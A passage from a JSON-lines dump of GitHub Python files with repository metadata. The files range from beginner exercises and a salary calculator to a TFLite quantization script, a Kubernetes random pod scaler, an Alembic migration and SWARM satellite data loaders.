primeira.\"\"\"\n\npessoa1 = int(input((\"Qual a idade da primeira pessoa? \")))\npessoa2 = int(input((\"Qual a idade da segunda pessoas? 
\")))\n\nif pessoa1 > pessoa2:\n print(\"True\")\nelse:\n print(\"False\")\n","repo_name":"liviaspereira/luiza_code","sub_path":"lista1/ex14.py","file_name":"ex14.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73526560831","text":"### tf-nightly-2.2.0.dev20200428\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport glob\n\ndef representative_dataset_gen():\n for image in raw_test_data:\n image = tf.image.resize(image, (256, 256))\n image = image[np.newaxis,:,:,:]\n image = image - 127.5\n image = image * 0.007843\n yield [image]\n\n\nraw_test_data = np.load('person_dataset.npy', allow_pickle=True)\n\n# Integer Quantization - Input/Output=float32\nconverter = tf.lite.TFLiteConverter.from_saved_model('saved_model')\nconverter.optimizations = [tf.lite.Optimize.DEFAULT]\nconverter.representative_dataset = representative_dataset_gen\ntflite_quant_model = converter.convert()\nwith open('deeplab_v3_plus_mnv2_decoder_256_integer_quant.tflite', 'wb') as w:\n w.write(tflite_quant_model)\nprint(\"Integer Quantization complete! - deeplab_v3_plus_mnv2_decoder_256_integer_quant.tflite\")\n\n","repo_name":"PINTO0309/PINTO_model_zoo","sub_path":"026_mobile-deeplabv3-plus/01_float32/04_integer_quantization.py","file_name":"04_integer_quantization.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":2990,"dataset":"github-code","pt":"60"} +{"seq_id":"28172506049","text":"def mergeSort(arr, left, right):\n invs = 0\n if(right-left>1):\n mid = (left+right)//2\n invs = invs +mergeSort(arr,left,mid)\n invs = invs +mergeSort(arr,mid,right)\n\n invs = invs +merge(arr,left,mid,right)\n \n return invs\n\ndef merge(arr, left, mid, right):\n tempArr = [0]*len(arr)\n lArr = arr[left:mid]\n rArr = arr[mid:right]\n\n i=0;\n j=0;\n k=0;\n invs = 0;\n\n for k in range(left,right):\n if(i0:\n\t\tpos+=1\n\telse: \n\t\tzero+=1\nprint('%f' % (pos/n,))\nprint('%f' % (neg/n,))\nprint('%f' % (zero/n,))\n","repo_name":"itsjwala/Hackerrank","sub_path":"__algorithms/warmup/plus-minus.py","file_name":"plus-minus.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41259732646","text":"# CTI-110\r\n# P4HW2 - Salary Calculator\r\n# Marc-Anthony Jones\r\n# 11-15-22\r\n# Tells me one or multiple Employee Salary Totals\r\n\r\n\r\ntotal = 0\r\n\r\novertimeRate = 0.5 \r\n\r\n# List\r\novertimePay = []\r\n\r\nRegularPay = []\r\n\r\ngrossPay = []\r\n\r\nwhile True:\r\n \r\n EmployeeName = input(\"\\nEnter employee's name or \\\"None\\\" to terminate: \")\r\n \r\n if EmployeeName == \"None\":\r\n \r\n break\r\n \r\n hours = int(input(\"How many hours did {} worked? \".format(EmployeeName)))\r\n \r\n payRate = float(input(\"What is {}\\'s pay rate? 
\".format(EmployeeName)))\r\n \r\n x = 0\r\n \r\n OP = RP = GP = 0.0\r\n \r\n if hours > 40:\r\n \r\n x = hours - 40\r\n \r\n OP = x * overtimeRate\r\n \r\n RP = 40 * payRate\r\n \r\n GP = OP + RP\r\n \r\n else:\r\n OP = 0.0\r\n \r\n RP = hours * payRate\r\n \r\n GP = RP\r\n \r\n overtimePay.append(float(OP))\r\n \r\n RegularPay.append(float(RP))\r\n \r\n grossPay.append(float(GP))\r\n \r\n total = total + 1\r\n\r\n # Print Statement\r\n \r\n print(\"Employee Name: \", EmployeeName)\r\n \r\n print(f'Hours Worked Pay Rate Overtime Overtime Pay Regular Pay Gross Pay')\r\n \r\n print(\"---------------------------------------------------------------------------------------------------\")\r\n \r\n print(f'{hours:.2f} {payRate:.2f} {x:.2f} {OP:.2f} {RP:.2f} {GP:.2f}') \r\n\r\n\r\n# Printing Total\r\n\r\nprint(\"Total number of employees entered: \",total)\r\n\r\nprint(\"Total amount payed for overtime: \", sum(overtimePay))\r\n\r\nprint(\"Total amount payed for regular hours: \", sum(RegularPay))\r\n\r\nprint(\"Total amount payed in gross: \", sum(grossPay))\r\n","repo_name":"jonesm4641/cti110","sub_path":"P4HW2_JonesMarcAnthony.py","file_name":"P4HW2_JonesMarcAnthony.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2807156354","text":"#!/usr/env/python3\n\ncarr = []\nn = int(input())\n\nfor _ in range(0, n):\n carr.append(input())\n\nfor idx in carr:\n _list = list(idx)\n streak = 0\n point = 0\n for i in _list:\n if i == 'O':\n point = point + 1 + streak\n streak += 1\n if i == 'X':\n streak = 0\n print(point)","repo_name":"clang-addicts/algorithm_ashzHax","sub_path":"백준/20220721/8958.py","file_name":"8958.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"45803137360","text":"import logging\nimport random\nimport time\nimport uuid\nfrom collections import defaultdict\nfrom typing import Dict\n\nfrom galileoexperiments.api.model import Pod\nfrom galileoexperiments.utils.constants import function_label, zone_label\nfrom galileoexperiments.utils.helpers import set_weights_rr, EtcdClient\nfrom galileoexperiments.utils.k8s import spawn_pods, get_pods, remove_pods\nfrom galileoexperimentsextensions.mobilenet.app import MobilenetProfilingApplication\nfrom kubernetes import client, config\n\nlogger = logging.getLogger(__name__)\n\nmax_pods = 10\nmax_pods_per_node = 4\nmin_pods = 1\n\netcd_client = EtcdClient.from_env()\nfn_label = 'mobilenet'\nimage = 'edgerun/mobilenet-inference:1.0.0'\npod_prefix = 'deployment'\npod_factory = MobilenetProfilingApplication().pod_factory\netcd_service_key = None\n# store pods by zone, and node\npod_map = defaultdict(lambda: defaultdict(list))\npod_id_idx = 0\nkeys = set()\n\nrandom.seed(42)\n\n\ndef get_load_balancer_pods() -> Dict[str, Pod]:\n pods = fetch_pods('type', 'api-gateway')\n lb = {}\n for pod in pods:\n # pod name, i.e.: go-load-balancer-deployment-zone-b-xwg9c\n pod_name = pod.metadata.name\n zone = f\"zone-{pod_name.split('-')[5]}\"\n ip = pod.status.pod_ip\n # not used\n pod_id = ''\n labels = {\n 'type': 'api-gateway',\n zone_label: zone\n }\n lb[zone] = Pod(pod_id, ip, labels, pod_name)\n return lb\n\n\ndef spawn(cluster, lbs, node, labels):\n postfix = str(uuid.uuid4())[:5]\n # create new instance\n pod_name = spawn_pods(image, f'{fn_label}-{pod_prefix}-{postfix}', node, labels, 1, pod_factory)[0]\n # update internal state to include newly 
created pod\n pod_map[cluster][node].append(pod_name)\n\n # blocks until pod is available\n get_pods([pod_name])\n\n # update weights\n update_weights(lbs)\n\n\ndef teardown(name):\n remove_pods([name])\n\n\ndef fetch_pod_names(label: str, value: str):\n config.load_kube_config()\n v1 = client.CoreV1Api()\n pods_list = v1.list_namespaced_pod('default')\n pods = []\n for pod in pods_list.items:\n fn_value = pod.metadata.labels.get(label)\n if fn_value == value:\n pods.append(pod.metadata.name)\n return pods\n\n\ndef fetch_pods(label: str, value: str):\n config.load_kube_config()\n v1 = client.CoreV1Api()\n pods_list = v1.list_namespaced_pod('default')\n pods = []\n for pod in pods_list.items:\n if pod.metadata.labels is None:\n continue\n\n fn_value = pod.metadata.labels.get(label)\n if fn_value == value:\n pods.append(pod)\n return pods\n\n\ndef do_chaos(nodes, lbs):\n logger.info(\"Chooses action...\")\n a = random.random()\n\n if a < 0.1:\n logger.info(\"Do nothing\")\n elif 0.1 <= a < 0.5:\n node = random.choice(nodes)\n cluster = node[1]\n node_name = node[0]\n labels = {\n function_label: fn_label,\n zone_label: cluster\n }\n\n logger.info(f\"Try to scale up on node {node_name}\")\n\n too_much_pods = True\n if len(pod_map[cluster][node_name]) < max_pods_per_node:\n no_pods = count_all_pods()\n if no_pods + 1 <= max_pods:\n too_much_pods = False\n\n if too_much_pods:\n logger.info(f\"Scale up on node {node_name} aborted, too many pods already running\")\n else:\n spawn(cluster, lbs, node_name, labels)\n else:\n # first check if enough pods are in the cluster\n no_pods = count_all_pods()\n if no_pods - 1 < min_pods:\n logger.info(f\"Not enough pods ({no_pods}) running to scale down. Minimum: {min_pods}\")\n return\n\n # now we fetch all nodes that have at least one pod instance running\n scale_down_candidates = []\n for node in nodes:\n node_name = node[0]\n cluster = node[1]\n if len(pod_map[cluster][node_name]) > 0:\n scale_down_candidates.append(node)\n\n # select one random node to scale down\n node = random.choice(scale_down_candidates)\n node_name = node[0]\n cluster = node[1]\n logger.info(f\"Scale down on node {node_name}\")\n scale_down(cluster, lbs, node_name)\n\n\ndef count_all_pods() -> int:\n count = 0\n for node_dict in pod_map.values():\n for pods in node_dict.values():\n count += len(pods)\n return count\n\n\ndef scale_down(cluster, lbs, node):\n # choose a random pod on the node\n to_remove = random.choice(pod_map[cluster][node])\n\n # remove pod from internal state\n pod_map[cluster][node].remove(to_remove)\n\n # update load balancer weight of cluster to not include the removed pod anymore\n update_weights(lbs)\n\n # teardown the pod\n teardown(to_remove)\n\n\ndef update_weights(lbs):\n for cluster in lbs.keys():\n # fetch pods in cluster\n pods = get_pods(pods_in_cluster(cluster))\n\n # look for other clusters that node the function\n for lb_cluster, lb_pod in lbs.items():\n if lb_cluster == cluster:\n continue\n else:\n if cluster_hosts_function(lb_cluster):\n pods.append(lb_pod)\n\n # update weights\n keys.add(set_weights_rr(pods, cluster, fn_label))\n\n\ndef pods_in_cluster(cluster):\n pods = []\n for node, node_pods in pod_map[cluster].items():\n pods.extend(node_pods)\n return pods\n\n\ndef cluster_hosts_function(cluster):\n node_function = False\n for node, pods in pod_map[cluster].items():\n if len(pods) > 0:\n node_function = True\n break\n return node_function\n\n\ndef cleanup():\n for node_dict in pod_map.values():\n for pod_list in node_dict.values():\n for 
pod in pod_list:\n try:\n teardown(pod)\n except Exception:\n pass\n for key in keys:\n etcd_client.remove(key)\n\n\ndef main():\n logging.basicConfig(level=logging._nameToLevel['INFO'])\n\n initial_pod_count = 2\n should_cleanup = True\n duration = 50\n reconcile_interval = 5\n\n logger.info('Start random scaler, that scales up the application at random')\n nodes = [\n ('eb-a-controller', 'zone-a'),\n ('eb-a-jetson-nx-0', 'zone-a'),\n ('eb-b-controller', 'zone-b'),\n ('eb-b-xeon-0', 'zone-b'),\n ('eb-b-xeon-1', 'zone-b'),\n ('eb-c-vm-0', 'zone-c')\n ]\n\n lbs = get_load_balancer_pods()\n\n fn_pods = fetch_pods(function_label, fn_label)\n while len(fn_pods) != initial_pod_count:\n logger.info(f'no function pods \"{fn_label}\" found. sleep 5 seconds...')\n time.sleep(5)\n fn_pods = fetch_pods(function_label, fn_label)\n\n for pod in fn_pods:\n node = pod.spec.node_name\n pod_map[pod.metadata.labels[zone_label]][node].append(pod.metadata.name)\n\n\n start = time.time()\n\n try:\n now = start\n while now <= start + duration:\n do_chaos(nodes, lbs)\n time.sleep(reconcile_interval)\n now = time.time()\n finally:\n if should_cleanup:\n cleanup()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"edgerun/galileo-experiments-tdis-2022","sub_path":"evaluation/scenario/randomscheduler/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"39034370898","text":"N=int(input())\narr=[list(input()) for _ in range(N)]\n\ndef quad(x,y,N):\n color=arr[x][y]\n for i in range(x,x+N):\n for j in range(y,y+N):\n if arr[i][j]!=color:\n print(\"(\",end=\"\")\n quad(x,y,N//2)\n quad(x,y+N//2,N//2)\n quad(x+N//2,y,N//2)\n quad(x+N//2,y+N//2,N//2) \n print(\")\",end=\"\") \n return\n\n if color=='0':\n print(0,end=\"\")\n else:\n print(1,end=\"\")\n \n\nquad(0,0,N)","repo_name":"wogkr810/coding-test","sub_path":"백준/Silver/1992. 
쿼드트리/쿼드트리.py","file_name":"쿼드트리.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10128413756","text":"import os\nimport random\nfrom Bio.Graphics.BasicChromosome import _ChromosomeComponent\nimport itertools\n\n__author__ = 'anton'\nimport sys\n\nnucls = \"ACGT\"\ndefault_rate = 0.05\nlen_range = (3000, 15000)\nsys.path.append(\"src/spades_pipeline\")\n\nimport SeqIO\n\n\ndef Mutate(seq, rate):\n s = list(seq)\n for i in range(len(seq)):\n if s[i] in nucls and random.random() < rate:\n s[i] = random.choice(nucls)\n return \"\".join(s)\n\n\ndef RandSegment(reference, len_r):\n pos = random.randint(0, len(reference) - len_r[1])\n return reference[pos : pos + random.randint(len_r[0], len_r[1])]\n\n\ndef GenerateInsertions(numins, result):\n ref = \"\".join(result)\n insertions = []\n for i in range(numins):\n seq = Mutate(RandSegment(ref, len_range), default_rate)\n insertions.append((random.randint(0, len(result)), seq))\n return sorted(insertions)\n\n\ndef GenerateDeletions(numdel, result):\n deletions = []\n for i in range(numdel):\n l = random.randint(0, len(result) - len_range[1])\n r = l + random.randint(len_range[0], len_range[1])\n if result[l:r].find(\"$\") == -1:\n deletions.append((l, r - l))\n return sorted(deletions)\n\ndef GroupByChrom(positions, reference):\n last = 0\n i = 0\n result = []\n for l in [len(r) for r in reference]:\n last += l\n tmp = []\n while i < len(positions) and positions[i][0] < last:\n tmp.append((positions[i][0] + l - last, positions[i][1]))\n i += 1\n result.append(tmp)\n return result\n\ndef Apply(seq, ins, d):\n result = []\n i = 0\n j = 0\n last = 0\n l = 0\n while i < len(ins) or j < len(d):\n if i < len(ins) and (j == len(d) or ins[i][0] < d[j][0]):\n if last < ins[i][0]:\n result.append(seq[last:ins[i][0]])\n l += ins[i][0] - last\n sys.stdout.write(\"Insertion: \" + str(l) + \" \" + str(l + len(ins[i][1])) + \"\\n\")\n result.append(ins[i][1])\n l += len(ins[i][1])\n last = ins[i][0]\n i += 1\n else:\n if last < d[j][0]:\n result.append(seq[last:d[j][0]])\n l += d[j][0] - last\n sys.stdout.write(\"Deletion: \" + str(l) + \" \" + str(d[j][1]) + \"\\n\")\n last = d[j][0] + d[j][1]\n j += 1\n result.append(seq[last:])\n return \"\".join(result)\n\ndef Generate(input, output, numins, numdel):\n reference = list(input)\n result = \"\".join([ch.seq for ch in reference])\n l = sum([len(ch) for ch in reference])\n ins = GroupByChrom(GenerateInsertions(numins, result), reference)\n d = GroupByChrom(GenerateDeletions(numdel, result), reference)\n for ch_ins, ch_d, chrom in itertools.izip(ins, d, reference):\n sys.stdout.write(\"Chromosome \" + chrom.id + \"\\n\")\n rec = SeqIO.SeqRecord(Apply(chrom.seq, ch_ins, ch_d), chrom.id)\n SeqIO.write(rec, output, \"fasta\")\n\nif __name__ == '__main__':\n Generate(SeqIO.parse(open(sys.argv[1], \"r\"), \"fasta\"), open(sys.argv[2], \"w\"), int(sys.argv[3]), int(sys.argv[3]))\n","repo_name":"ablab/spades","sub_path":"assembler/src/tools/IlluminaTech/generate_variations.py","file_name":"generate_variations.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":623,"dataset":"github-code","pt":"60"} +{"seq_id":"30252981639","text":"\"\"\"\n 读取excel表格信息\n\"\"\"\nimport openpyxl\nimport os\nimport copy\nfrom common.ReadPath import EXCEL_PATH\n\n\nclass ReadExcel:\n def __init__(self):\n self.EXCEL_PATH = EXCEL_PATH\n # 用来存放数据\n self.data = {}\n self.subdata = []\n # 
判断文件夹路径是否存在\n if os.path.exists(self.EXCEL_PATH) is False:\n os.makedirs(self.EXCEL_PATH)\n raise(self.EXCEL_PATH+\"路径不存在\")\n\n # 读取excel表格路径\n def read_excel_path(self):\n excels_path = []\n for root, dirs, files in os.walk(self.EXCEL_PATH):\n for i in files:\n excel_path = os.path.join(root, i)\n excels_path.append(excel_path)\n\n for excel_file in excels_path:\n excel_xlsx_file = openpyxl.load_workbook(excel_file, read_only=True)\n for excel_sheet in excel_xlsx_file.sheetnames:\n sheet = excel_xlsx_file[excel_sheet]\n max_row = sheet.max_row\n max_column = sheet.max_column\n if max_row > 1 and max_column > 1:\n for row in range(2, max_row + 1):\n for col in range(1, max_column+1):\n key = sheet.cell(row=1, column=col).value\n self.data[key] = sheet.cell(row=row, column=col).value\n data = copy.deepcopy(self.data)\n self.subdata.append([excel_sheet, data])\n return self.subdata\n","repo_name":"fuyaolin/FYL_API_AT","sub_path":"common/ExcelRead.py","file_name":"ExcelRead.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"8679789501","text":"from pprint import pprint\nimport re\nimport csv\n## Читаем адресную книгу в формате CSV в список contacts_list:\n\nwith open(\"phonebook_raw.csv\", encoding='UTF-8') as f:\n rows = csv.reader(f, delimiter=\",\")\n contacts_list = list(rows)\npprint(contacts_list)\n\n## 1. Выполните пункты 1-3 задания.\ncorrect_list = []\nfor contact in contacts_list[0:]:\n name = ' '.join(contact[0:3]).split(' ')\n contact[0:3] = name[0:3]\n pattern_num = r'(\\+7|8)?(\\s*)(\\(*)(\\d{3})(\\)*)(\\s*)(\\-*)(\\d{3})(\\-*)(\\d{2})(\\-*)(\\d{2})(\\s*)(\\(*)(доб)*(\\.*)(\\s*)(\\d+)*(\\)*)'\n substitusion_num = r'+7(\\4)\\8-\\10-\\12\\13\\15\\16\\18'\n result = re.sub(pattern_num, substitusion_num, contact[5])\n contact[5] = result\n correct_list.append(contact)\n\ncontacts = {}\nfor i in correct_list:\n if i[0] not in contacts:\n contacts[i[0]] = i[1:]\n else:\n list1 = contacts.get(i[0])\n for j in range(1, 6):\n if (list1[j-1] == '' and i[j] != ''):\n list1[j-1] = i[j]\n contacts[i[0]] = list1[1:]\n\nfinal_list=[]\nfor key, value in contacts.items():\n value.insert(0, key)\n final_list.append(value)\n\n## 2. Сохраните получившиеся данные в другой файл.\n## Код для записи файла в формате CSV:\nwith open(\"phonebook.csv\", \"w\", newline='', encoding='UTF-8') as f:\n datawriter = csv.writer(f, delimiter=',')\n ## Вместо contacts_list подставьте свой список:\n datawriter.writerows(final_list)","repo_name":"seeexzet/Task_3.2_regular","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5789675190","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport compas\n\nfrom compas_rhino.utilities import volmesh_from_polysurfaces\n\nfrom compas_3gs.diagrams import FormNetwork\nfrom compas_3gs.diagrams import ForceVolMesh\n\nfrom compas_3gs.algorithms import volmesh_dual_network\nfrom compas_3gs.algorithms import volmesh_reciprocate\n\nfrom compas_3gs.utilities import get_index_colordict\nfrom compas_3gs.utilities import get_force_colors_hf\n\ntry:\n import rhinoscriptsyntax as rs\nexcept ImportError:\n compas.raise_if_ironpython()\n\n\n# ------------------------------------------------------------------------------\n# 1. 
make volmesh from rhino polysurfaces\n# ------------------------------------------------------------------------------\nlayer = 'force_volmesh'\n\nguids = rs.GetObjects(\"select polysurfaces\", filter=rs.filter.polysurface)\nrs.HideObjects(guids)\n\nforcediagram = ForceVolMesh()\nforcediagram = volmesh_from_polysurfaces(forcediagram, guids)\nforcediagram.layer = layer\nforcediagram.attributes['name'] = layer\n\n\n# ------------------------------------------------------------------------------\n# 2. make dual network from volmesh (form diagram)\n# ------------------------------------------------------------------------------\nlayer = 'form_network'\n\nformdiagram = volmesh_dual_network(forcediagram, cls=FormNetwork)\nformdiagram.layer = layer\nformdiagram.attributes['name'] = layer\n\n# move dual_network\noffset = 2\nwidth = formdiagram.bounding_box()[1][0] - formdiagram.bounding_box()[0][0]\nfor vkey in formdiagram.nodes():\n x = formdiagram.node_attribute(vkey, 'x')\n formdiagram.node_attribute(vkey, 'x', x + width * offset)\n\n\n# ------------------------------------------------------------------------------\n# 3. reciprocate\n# ------------------------------------------------------------------------------\nvolmesh_reciprocate(forcediagram,\n formdiagram,\n kmax=1000,\n weight=1,\n edge_min=0.5,\n edge_max=20,\n tolerance=0.01)\n\n\n# ------------------------------------------------------------------------------\n# 4. visualisation - color id\n# ------------------------------------------------------------------------------\nuv_c_dict = get_index_colordict(list(formdiagram.edges()))\nhf_c_dict = get_force_colors_hf(forcediagram, formdiagram, uv_c_dict=uv_c_dict)\n\nfaces_to_draw = [fkey for fkey in forcediagram.faces() if not forcediagram.is_halfface_on_boundary(fkey)]\n\nforcediagram.clear()\nforcediagram.draw_edges()\nforcediagram.draw_faces(faces=faces_to_draw, color=hf_c_dict)\n\nformdiagram.clear()\nformdiagram.draw_edges(color=uv_c_dict)\n","repo_name":"BlockResearchGroup/compas_3gs","sub_path":"examples/_old_examples/01_70_volmesh_color_id.py","file_name":"01_70_volmesh_color_id.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"}
+{"seq_id":"36369291213","text":"\"\"\"empty message\n\nRevision ID: 6c1b0006e18f\nRevises: \nCreate Date: 2019-04-14 19:35:06.175655\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"6c1b0006e18f\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table(\n \"team\",\n sa.Column(\"team_id\", sa.Integer(), nullable=False),\n sa.Column(\"name\", sa.String(length=50), nullable=False),\n sa.PrimaryKeyConstraint(\"team_id\"),\n sa.UniqueConstraint(\"name\"),\n )\n op.create_table(\n \"person\",\n sa.Column(\"person_id\", sa.Integer(), nullable=False),\n sa.Column(\"first_name\", sa.String(length=50), nullable=False),\n sa.Column(\"last_name\", sa.String(length=50), nullable=False),\n sa.Column(\"role\", sa.String(length=50), nullable=True),\n sa.Column(\"position\", sa.String(length=50), nullable=True),\n sa.Column(\"team_id\", sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint([\"team_id\"], [\"team.team_id\"]),\n sa.PrimaryKeyConstraint(\"person_id\"),\n )\n op.create_table(\n \"team_manager\",\n sa.Column(\"manager_id\", sa.Integer(), nullable=False),\n sa.Column(\"manager\", sa.Integer(), nullable=False),\n sa.Column(\"captain\", sa.Integer(), nullable=False),\n sa.Column(\"team\", sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint([\"captain\"], [\"person.person_id\"]),\n sa.ForeignKeyConstraint([\"manager\"], [\"person.person_id\"]),\n sa.ForeignKeyConstraint([\"team\"], [\"team.team_id\"]),\n sa.PrimaryKeyConstraint(\"manager_id\"),\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table(\"team_manager\")\n op.drop_table(\"person\")\n op.drop_table(\"team\")\n # ### end Alembic commands ###\n","repo_name":"andela-football-league/afl-ug-backend","sub_path":"migrations/versions/6c1b0006e18f_.py","file_name":"6c1b0006e18f_.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"33850719445","text":"import os, glob, numpy as np, pysatCDF, h5py, itertools\nfrom ttools import config, utils\n\n\nALL_SWARM_FIELDS = (\n 'Latitude', 'Longitude', 'Height', 'Radius', 'SZA', 'SAz', 'ST', 'Diplat', 'Diplon', 'MLat', 'MLT', 'AACGMLat',\n 'AACGMLon', 'n', 'Te_hgn', 'Te_lgn', 'T_elec', 'Vs_hgn', 'Vs_lgn', 'U_SC', 'Flagbits'\n)\n\n\nSWARM_FIELDS_LESS_MAG_COORDS = (\n 'Height', 'Radius', 'SZA', 'SAz', 'ST', 'n', 'Te_hgn', 'Te_lgn', 'T_elec', 'Vs_hgn', 'Vs_lgn', 'U_SC', 'Flagbits'\n)\n\n\nSWARM_NEW_COORDS = (\n 'apex_lat', 'apex_lon', 'qd_lat', 'qd_lon', 'mlt', 'lat', 'lon'\n)\n\n\ndef get_swarm_data(start_date, end_date, sat, data_dir=None, coords_dir=None):\n \"\"\"Gets SWARM data and timestamps assuming regular sampling. 
Fills in missing time steps with NaNs.\n Parameters\n ----------\n start_date, end_date: numpy.datetime64\n sat, data_dir, coords_dir: str\n Returns\n -------\n data: dict\n ref_times: numpy.ndarray[datetime64]\n \"\"\"\n if data_dir is None:\n data_dir = os.path.join(config.swarm_dir, \"extd_efi_lp\")\n if coords_dir is None:\n coords_dir = config.swarm_coords_dir\n fields = SWARM_FIELDS_LESS_MAG_COORDS + SWARM_NEW_COORDS\n\n dt = np.timedelta64(500, 'ms')\n dt_sec = dt.astype('timedelta64[ms]').astype(float)\n start_date = (np.ceil(start_date.astype('datetime64[ms]').astype(float) / dt_sec) * dt_sec).astype('datetime64[ms]')\n end_date = (np.ceil(end_date.astype('datetime64[ms]').astype(float) / dt_sec) * dt_sec).astype('datetime64[ms]')\n ref_times = np.arange(start_date, end_date, dt)\n ref_times_ut = ref_times.astype('datetime64[ms]').astype(float)\n data = {f: np.ones(ref_times.shape[0]) * np.nan for f in fields}\n file_dates = np.unique(ref_times.astype('datetime64[D]'))\n file_dates = utils.decompose_datetime64(file_dates)\n for i in range(file_dates.shape[0]):\n y = file_dates[i, 0]\n m = file_dates[i, 1]\n d = file_dates[i, 2]\n files = glob.glob(os.path.join(data_dir, f\"SW_EXTD_EFI{sat.upper()}_LP_HM_{y:04d}{m:02d}{d:02d}*.cdf\"))\n files = filter_swarm_files(files)\n for fn in files:\n file_data = open_swarm_file(fn)\n coords_fn = os.path.join(coords_dir, f\"{utils.no_ext_fn(fn)}_coords.h5\")\n file_data.update(open_swarm_coords_file(coords_fn))\n file_times_ut = (np.floor(file_data['Timestamp'].astype('datetime64[ms]').astype(float) / dt_sec) * dt_sec)\n # assume ut is increasing and has no repeating entries, basically that it is a subset of ref_times_ut\n r_mask = np.in1d(ref_times_ut, file_times_ut)\n c_mask = np.in1d(file_times_ut, ref_times_ut)\n for f in fields:\n if f in file_data:\n data[f][r_mask] = file_data[f][c_mask]\n return data, ref_times\n\n\ndef filter_swarm_files(files):\n \"\"\"given a list of SWARM filenames, returns a list only including the latest version of each file\n Parameters\n ----------\n files: list[str]\n Returns\n -------\n list[str]\n \"\"\"\n result = []\n base = [(os.path.split(fn)[0], utils.no_ext_fn(fn)) for fn in files]\n splitup = [(b[:-4], b[-4:], a) for a, b in base]\n splitup = sorted(splitup, key=lambda x: x[0])\n for key, grp in itertools.groupby(splitup, lambda x: x[0]):\n latest_version = sorted(grp, key=lambda x: x[1])[-1]\n result.append(os.path.join(latest_version[2], f\"{latest_version[0]}{latest_version[1]}.cdf\"))\n return result\n\n\ndef open_swarm_file(fn):\n \"\"\"Opens a SWARM file\n Parameters\n ----------\n fn: str\n Returns\n -------\n dict\n Timestamp\n Latitude\n Longitude\n Height: m Height above WGS84 reference ellipsoid.\n Radius: m Distance from the Earth’s centre.\n SZA: deg Solar Zenith Angle.\n SAz: deg Solar azimuth in Earth frame, north is 0 deg.\n ST: hour Apparent solar time\n Diplat: deg Quasi-dipole latitude\n Diplon\n MLT: hour Magnetic local time based on quasi-dipole\n AACGMLat: deg Altitude-adjusted corrected geomagnetic latitude\n AACGMLon\n n: cm-3 Plasma density from ion current\n Te_hgn: K Electron temperature, estimated by the high gain probe\n Te_lgn: K Electron temperature, estimated by the low gain probe\n Te: K Electron temperature, blended value\n Vs_hgn: V Spacecraft potential, estimated by the high gain probe\n Vs_lgn: V Spacecraft potential, estimated by the low gain probe\n Vs: V Spacecraft potential, blended value\n Flagbits\n \"\"\"\n with pysatCDF.CDF(fn) as f:\n data = f.data\n 
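# f.data maps each CDF variable name (e.g. 'Timestamp') to a numpy array\n    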
print(f\"Opened swarm file: {fn}, size: {data['Timestamp'].shape}\")\n return data\n\n\ndef open_swarm_coords_file(fn):\n \"\"\"Opens precomputed swarm coordinates h5 file (one per swarm cdf file)\n Parameters\n ----------\n fn: str\n Returns\n -------\n dict of numpy.ndarray[float]\n keys: 'apex_lat', 'apex_lon', 'qd_lat', 'qd_lon', 'mlt'\n \"\"\"\n coords = {}\n with h5py.File(fn, 'r') as f:\n coords['apex_lat'] = f['apex_lat'][()]\n coords['apex_lon'] = f['apex_lon'][()]\n coords['qd_lat'] = f['qd_lat'][()]\n coords['qd_lon'] = f['qd_lon'][()]\n coords['mlt'] = f['mlt'][()]\n coords['lat'] = f['lat'][()]\n coords['lon'] = f['lon'][()]\n print(f\"Opened swarm coords file: {fn}, size: {coords['apex_lat'].shape}\")\n return coords\n\n\n\"\"\"\nCreate trough dataset:\n 0: No trough\n 1: Non-SAPS trough\n 2: SAPS trough\n 3: unknown trough\n\nProcedure:\n 1. identify what trough connected component DMSP is passing trough, label the CC as saps or non-saps\n 2. identify location of \n\nCreate plots:\n (low, medium, high Kp) x (SAPS, no SAPS)\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import binned_statistic_dd\nimport bottleneck as bn\n\nfrom ttools import io, plotting, utils, config, satellite\n\ntrough_data = np.load(\"C:\\\\Users\\\\Greg\\\\data\\\\dataset.npz\")\ntrough = trough_data['trough']\ntec_times = trough_data['time']\ntec_ut = tec_times.astype(int)\nX = -1 * trough_data['x']\nX[~trough] = np.nan\nkp = io.get_kp(tec_times)\n\nif True:\n batch_size = 100\n flow_grid_count = np.empty_like(X)\n flow_grid_sum = np.empty_like(X)\n for batch in 